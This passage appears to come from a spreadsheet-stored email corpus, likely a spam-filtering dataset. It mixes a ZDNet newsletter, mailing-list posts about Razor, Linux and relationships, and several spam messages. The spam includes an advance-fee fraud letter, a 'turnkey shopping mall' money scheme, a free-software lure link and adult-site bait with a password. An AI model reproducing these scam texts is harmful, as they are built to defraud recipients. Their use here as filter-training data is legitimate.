 Click?q=3D42-rF7cIPKGJAvfr3ppz3F7_4EMIrdR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D57-YJIXII0aTAfkitLF0F_wt9Q9dZuR" &gt;&lt;b&gt;Your=
  top tips for shaping up flabby hard drives&lt;/b&gt;&lt;/a&gt;&lt;br&gt;AnchorDesk readers k=
 now that using defrag software on a regular basis makes their hard drives r=
 un smoothly and efficiently. David shares a list of readers' favorite apps,=
  plus advice on preparing drives for the process. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D6c-SUL3IuP88_S_8w5KQCL5-NPyEdsR" &gt;&lt;b&gt;Quic=
 kPoll results: Would you pay $5 to speed up Web surfing?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;p&gt;
        =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;STEPHAN SOMOGYI&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/166.gif" alt=3D"STEPHAN SOMOGYI" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D81-z1IaQ-K=
 pQsz5u21pqfRO9R6BpKlR" &gt;&lt;b&gt;Here's what I think of Jobs's Macworld keynote&lt;/=
 b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif=
 " width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Never one to shy away from Friday-morning quarterbacking, S=
 tephan deconstructs both the good and bad in Steve Jobs's Macworld Expo key=
 note. Read on for his take on everything from .Mac to the new iMac.&lt;/font&gt;&lt;=
 /td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;STEVE KOVSKY&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/473.gif" alt=3D"STEVE KOVSKY" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D96-pjdWQtd=
 hd93zk1ejZWSoS2P4Jm4R" &gt;&lt;b&gt;TiVo: Why it gets no gold stars for mandatory ad=
 s&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 First TiVo forced subscribers' machines to record sitcoms t=
 hey didn't want. Now the company is planting ads on their lists of favorite=
  programs. No wonder TiVo owners have become such a bunch of whiners, says =
 Steve.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYp=
 Mbna0ewyXydit0M-0OvrR" &gt;&lt;b&gt;Want to become a PC know-it-all? Here's how&lt;/b&gt;&lt;=
 /a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" w=
 idth=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Want to be a power user? Wish you could master the inner wo=
 rkings of your PC and create Web pages? Preston has three downloadable guid=
 es for tweaking Windows XP, understanding the Registry, and writing HTML.&lt;/=
 font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP1Iwu-XYt41H99K8F=
 ZuSiR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3Dd6-yw2KQMPMW6pO4HPnOIRzw0LGkk4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3Deb-Hl7orSD=
 7zUbklPZWm6XdYcGMt-Ssi9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D00-4FQlI9QDB2XcLB4bgi4cHr7W6TiR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGcDl=
 2k7JwtAV-hDEc2lRbPR"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href=3D"http://clickthru.online.com/Click?q=3D2b-2FVYINzw=
 pGvyIkAwzk0xBfd-8WrR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D41-qqJ1IEKzoK2rLLXU5CfC=
 kxHB0FFR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D56-NwKYInnwtkU5BuBrctPQDwwaMC9R" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D6b-8g5ZIHEXs-d=
 SO5B80ywQ-4d0P6cR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D80-KTKvQQ0J6P8TT0KoaDkjVsTLZ8iR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D95-XdwrQvdKmPVvtPIr1yZeU_u_KnPR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXUQ1Cwg_mlWLXZBX=
 qONOVnR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3Dc0-kfs-QWP1Iwu-XSa41H99K8FZuSiR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL=
 249bqbo3HCu4jNix1DPPR"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NL=3De501-01&amp;ISSUE=3D2002-07-19" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Dea-f=
 jpy-XV9-0jGQHL5sWi23hhY99RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Own An Automated Shopping Mall                       32736
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;AUTOMATED HOME BASED BUSINESS&lt;/title&gt;
 &lt;STYLE type=3D"text/css"&gt;
 &lt;!--
 H3 {
 font-family: Verdana, Arial;
 font-weight: bold;
 color: #CC0000;
 font-size: medium;
 }
 H4 {
 font-family: Verdana, Arial;
 font-weight: normal;
 color: #000000;
 font-size: medium;
 }
 H5 {
 font-family: Verdana, Arial;
 font-weight: bold;
 color: #006600;
 font-size: medium;
 }
 --&gt;
 &lt;/STYLE&gt;
 &lt;/head&gt;
 &lt;body topmargin=3D"0" leftmargin=3D"0" bgcolor=3D"#006600" link=3D"#FF0000=
 " vlink=3D"#FF0000" alink=3D"#FF0000"&gt;
 &lt;div align=3D"center"&gt;
 &lt;center&gt;&lt;table border=3D"0" width=3D"90%" cellspacing=3D"0" cellpadding=3D=
 "10"&gt;&lt;tr&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;td bgcolor=3D"#33CC33"&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" size=3D"6" color=3D"#CC0000"&gt;&lt;b=
 &gt;ONLINE
 SALES ARE BOOMING!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;td bgcolor=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FFFF00" size=3D"5"&gt;
 AUTOMATED HOME-BASED BUSINESS!!!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;t=
 d bgcolor=3D"#FFFFFF"&gt;
 &lt;H3&gt;Dear Friend,&amp;nbsp;&lt;/H3&gt;
 &lt;H3&gt;
 &lt;i&gt;This is an excellent opportunity to participate in an industry that is =
 averaging over 
 $1 Billion in retail sales weekly.&amp;nbsp;&lt;u&gt;&lt;font color=3D"#CC0000"&gt;
 E-Marketer&lt;/font&gt;&lt;/u&gt; projects that U.S. online sales 
 will grow to $75 Billion in 2002 -- a 50% increase over 2001!&lt;/i&gt;&lt;/H3&gt;
 &lt;H4&gt;Online consumer spending in the United States reached
 approximately $20 Billion in 1999.&amp;nbsp; It increased to
 approximately $42 Billion in 2000.&amp;nbsp; 
 &lt;u&gt;&lt;font color=3D"#CC0000"&gt;E-Marketer&lt;/font&gt;&lt;/u&gt;
 reports that U.S. online retail sales were $49.8 Billion in 2001, and are
 projected to grow to over 
 &lt;u&gt;&lt;font color=3D"#CC0000"&gt;$155 Billion by the year 2005&lt;/font&gt;&lt;/u&gt;&lt;/H4&gt;
 &lt;H5&gt;Our shopping mall
           platform consists of over ONE THOUSAND top-name
           merchants, with millions of products in a searchable database,
           covering 20 broad categories of goods and services -- a true one=
 -stop
           shopping experience.&lt;/H5&gt;
 &lt;H3&gt;We
           provide you with the resources you need to drive customers to yo=
 ur
           shopping mall, and the customer retention tools to keep them com=
 ing
           back.&amp;nbsp; Your commissions are automatically credited to your
           account using special coding, and the money is sent directly to =
 &lt;u&gt;your&lt;/u&gt;
           mailbox.&lt;/H3&gt;
 &lt;H5&gt;&lt;u&gt;Over
           $500,000 has been spent on developing and refining our shopping =
 mall
           platform.&amp;nbsp; You can own your own completely automated turnke=
 y
           shopping mall for a very low price!&lt;/u&gt;&lt;/H5&gt;
 &lt;H3&gt;&lt;u&gt;If you are at least 25 years old, you can own
           a major shopping mall with your name on it for as little as &lt;fon=
 t size=3D"6" color=3D"#006600"&gt;$3,000.00&lt;/font&gt;&lt;/u&gt;&lt;/H3&gt;
 &lt;H4&gt;It is easy to see that with the unparalleled growth of online
           shopping worldwide, a significant source of revenue can be obtai=
 ned
           from our completely automated shopping mall platform;
 &lt;font color=3D"#CC0000"&gt;&lt;u&gt;and no computer programming experience is neces=
 sary!&lt;/u&gt;&lt;/font&gt;&lt;/H4&gt;
 &lt;H4&gt;
 Our fully automated shopping mall platform provides one of the most compel=
 ling and comprehensive 
 online marketing opportunities available.&amp;nbsp;&lt;/H4&gt;
 &lt;H3&gt;You can earn income 24/7.&amp;nbsp; With our
           shopping mall you carry no inventory, you do no shipping, and yo=
 u
           don't have to get credit cards approved.&amp;nbsp; Plus, there is LI=
 VE
           customer support available to you!&amp;nbsp; Work smarter, not harde=
 r!&lt;/H3&gt;
 &lt;font face=3D"verdana, arial" size=3D"4" color=3D"#006600"&gt;
 &lt;blockquote&gt;&lt;blockquote&gt;&lt;ul type=3D"square"&gt;
           &lt;li&gt;Fully Automated&lt;/li&gt;
           &lt;li&gt;$4 Billion Plus Monthly Business&lt;/li&gt;
           &lt;li&gt;No Inventory&lt;/li&gt;
           &lt;li&gt;No Shipping&lt;/li&gt;
           &lt;li&gt;No Credit Cards Needed&lt;/li&gt;
           &lt;li&gt;Earn Income 24/7&lt;/li&gt;
           &lt;/ul&gt;
           &lt;/blockquote&gt;
           &lt;/blockquote&gt;&lt;/font&gt;
 &lt;H3&gt;Please click on the link below to receive
           a free information package with full details on how you can
           participate in this exciting, high-growth industry.&lt;/H3&gt;
 &lt;/td&gt;
 &lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;td bgcolor=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;&lt;B&gt;&lt;font color=3D"#CC0000" size=3D"+2" face=3D"verdana=
 , arial"&gt;L i v e&amp;nbsp;&amp;nbsp; C u s t o m e r&amp;nbsp;&amp;nbsp; S u p p o r t&lt;/fo=
 nt&gt;&lt;/B&gt;&lt;font color=3D"#CC0000"&gt;
 &lt;/font&gt;
 &lt;b&gt;&lt;u&gt;&lt;a href=3D"http://www.deal2002.com/emgmail/index.htm"&gt;&lt;font face=3D"=
 verdana, arial" size=3D"4" color=3D"#CC0000"&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font face=3D"verdana, arial" size=3D"5"&gt;CLICK
           HERE FOR YOUR FREE INFORMATION PACKAGE&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#FFFFFF" face=3D"Arial" size=3D"2"&gt;
 This email cannot be considered spam as it was sent in compliance with 
         all existing and proposed email legislation.&lt;br&gt;
           This is a one-time mailing.&amp;nbsp;
 &lt;/font&gt;&lt;font color=3D"#ffffff" size=3D"2" face=3D"Tahoma"&gt;&amp;nbsp;If you wis=
 h to be unsubscribed
       from this list, please &lt;a href=3D"http://www.deal2002.com/removeme.h=
 tml"&gt;
     &lt;font color=3D"#FFFFFF"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;td bgc=
 olor=3D"#33CC33"&gt;&lt;/td&gt;&lt;td bgcolor=3D"#33CC33"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/center&gt;&lt;=
 /div&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wedding etiquette
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#wedding_etiquette
 Date: 2002-09-30T12:16:54-05:00
 _Margaret Berry_: Don't Be Rude: Part IV, Weddings[1]. &amp;#8220;There's a lot of 
 room for error with invitations. It's helpful to think of them as petite social 
 landmines with quaint wax seals.&amp;#8221;
 [1] http://www.themorningnews.org/archives/editorial/dont_be_rude_part_iv_weddings.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] "No razor servers available at this time"
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm still seeing razor reporting bomb out with a small variety of messages.
 Would reinitializing something here help, or does razor do that as needed
 anyway, and this just reflects trouble at the servers?
 Also, since these are reports I'm making from within Mutt, it's annoying
 that the error messages garble the X window a bit. If there's nothing
 constructive to do about razor failing, can I at least turn off the failure
 messages? One way or the other I'd rather not see them.
 Whit 
 On Wed, Sep 25, 2002 at 12:57:13PM -0400, Whit Blauvelt wrote:
 &gt; I'm getting "no servers available" about half the time in the last few days.
 &gt; This is with Razor 2. Is there something I need adjust in the installation
 &gt; here, or are the servers just down/overloaded?
 &gt; 
 &gt; Thanks,
 &gt; Whit
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">If it's unwritten, how'm I supposed to know unless someone CALLS me up and 
 tells me/  hint hint.  LOL  (:  Well, I reckon it's a written rule now, 
 since it's on the internet in text format w/ your name attached, but then 
 again, when have I ever followed any damned rules???  (:
 C
 On Sat, 7 Sep 2002, Geege Schuman wrote:
 &gt; unwritten rule.  8-)
 &gt; 
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 10:21 PM
 &gt; To: Geege Schuman
 &gt; Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@example.com
 &gt; Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; Why should I?  (:
 &gt; C
 &gt; 
 &gt; On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; 
 &gt; &gt; quitcherbraggin.
 &gt; &gt;
 &gt; &gt; :-)
 &gt; &gt; gg
 &gt; &gt;
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; &gt; To: bitbitch@magnesium.net
 &gt; &gt; Cc: Adam L. Beberg; fork@example.com
 &gt; &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; &gt; close him because he is industrious and creative, and because he
 &gt; &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; &gt; stumbles around in the dark.
 &gt; &gt; Cindy
 &gt; &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; &gt; the order in which they move into my house.  -smiles at chris-
 &gt; &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; &gt; computer job.  Le Sigh.  (:
 &gt; &gt;
 &gt; &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; &gt;
 &gt; &gt; &gt; Hello Adam,
 &gt; &gt; &gt;
 &gt; &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt; &gt;
 &gt; &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; &gt; then
 &gt; &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; &gt; she and
 &gt; &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded"
 &gt; choices?
 &gt; &gt; &gt;
 &gt; &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; &gt; now.
 &gt; &gt; &gt;
 &gt; &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; &gt; marriage.
 &gt; &gt; &gt;
 &gt; &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; &gt; blame law school and my cat.
 &gt; &gt; &gt;
 &gt; &gt; &gt; -BB
 &gt; &gt; &gt;
 &gt; &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] MICHAEL ! ilug
</t>
  </si>
  <si>
    <t xml:space="preserve"> ilug ,
  From;Mr.Michael Kamah and Family,
           Johannesburg,South Africa.
 My Dear ,
 Good day.This very confidential request should come as a surprise to you.But it is because of the nature of what is happening to me and my family urged me to contact you, and I quite understand that this is not the best way to contact you because of the nature of my request and the attention it requires.I got your contact information from your country's information directory during my desperate search for someone who can assist me secretly and confidentially in relocating and managing some family fortunes.
 My name is Mr.Michael Kamah, the second son of Mr.Smith  Kamah, of Beitbridge Zimbabwe.At the height of the present political crises in our country,in which the white farmers in our country are being slained and ripped off their belongings by the supporters of our president,Mr.Robert G.Mugabe,in their efforts to reclaim all the white owned farms in our country,my father and my elder brother were brutally slained to a painful death on the 13th of february,2002, in their struggle to protect some white farmers who ran to take refuge in our house.My father,during his life on earth was a prominent business man who trades on diamond and gold from some foreign countries .He publicly opposes the crude policies and crime against humanity on the white farmers by Mr.Robert Mugabe and his followers,which they enforced media law restrictions to protect their wicked acts.That not being enough,the president and his followers after winning the last undemocratic elections decided to block and !
 confiscate all accounts and assets of our black indigenes[that included my fathers assets and accounts] who oppose his policies and render support to these white farmers,along with the assets of these white farmers themselves,that are being presently confiscated.I therefore decided to move my mother and younger sister to the Republic of South Africa,where we presently live without anything and without any source of livelyhood.
 During my fathers life on earth,he had deposited the sum of Eight Million and Six Hundred Thousand United States Dollars[$8.600.000.00],in a trunk box with a Finance and Security Company in the Republic of Togo for a cash and carry Diamond and Gold business with some foreign business customers, awaiting instructions to be moved to its destination,which he never completed before he met his untimely death on that faithful day.In view of this and as the only surviving son of my father,and with the present clamp down,killing and confiscation of his assets as one of those who render support to the white farmers in our country,I therefore humbly wish to inform you of my intentions to use your name and adress in making sure that this fund is lifted out of Africa finally,to the Europe office of the finance company and also seek for your honest and trustworthy assistance to help me clear and accommodate this money over there before it is dictated out and blocked by the present Mugabe's!
  regime.My mother is presently with the valid document covering this deposit.
 Now this is what I actually want you to do for me;
 1. I want you to be presented to the Finance and Security company as the person I contacted to assist my family for this purpose, with whose name and adress myself and my mother will forward to them their office in the Republic of Togo as the person that will clear this money when they lift it out to their europe office.
 2. To finally assist me in accommodating and managing this money in any lucrative business in your country for at least three years. 
 Please,I hope you will grant and view this very request with favour and much understanding of our situation now,and will be a very honest and reliable person to deal with.And also bearing in mind the confidential nature of this my request,I emphasize please that you keep every bit of it to yourself so as to protect my familys future and yourself rendering this help.Thanking you in anticipation of your urgent response as soon as you read this very request.
 Best Regards, 
 Mr.Michael Kamah and family. 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] ffs
</t>
  </si>
  <si>
    <t xml:space="preserve">bryan roycroft wrote:
 &gt; has anyone got information on enabling ffs support in
 &gt; the kernel, i was looking around, and information on
 &gt; the subject seems to be sparse. 
 Is this to mount an OS-X partition?
 The following would be of interest in that case:
 http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=101198676827824&amp;w=2
 summary is you should be able to mount FFS readonly,
 and the config item probably UFS:
 [padraig@pixelbeat ~]$ grep UFS /boot/config-2.4.18-3
 CONFIG_UFS_FS=m
 # CONFIG_UFS_FS_WRITE is not set
 So `modprobe ufs` should work on a standard RH7.3 install?
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Software! Games, Movie, Mp3, more free now!!! blwe
</t>
  </si>
  <si>
    <t xml:space="preserve">My FREE Media Sofware link
 enjoy, Jim---&gt;
 http://www.freeoptmail3.com/jimmy/plugin.html
 &lt;a href=http://www.freeoptmail3.com/jimmy/plugin.html&gt;Click here to go to the site&lt;/a&gt; 
 Personal Quote: All for one and one for all. This is not a spam email. This email was sent to
 you because your email was entered in on a website requesting to be a registered subscriber.
 &lt;a href=mailto:e-removes@btamail.cn.net&gt;click here to cancel your account&lt;/a&gt; and you will 
 never receive another email from us! Please add remove in the subject line.
 tgwwcvwledqaerisufctgsfkf
</t>
  </si>
  <si>
    <t xml:space="preserve">###################################
   FREE Adult Lifetime Membership
       Limited Time Offer!!!
 ###################################
 YOUR INSTANT ACCESS PASSWORD
 LOGIN NAME:   zzzz@example.com 
 PASSWORD:     AcKWGy4L
 5 of the Best Adult Sites on the Internet for FREE!
 ---------------------------
 NEWS 08/25/02
 Over 3.1 Million Members have signed up for FREE, Last month 229,947
 New Members signed up for Free with the limited time offer.
 Are you a FREE Member yet???
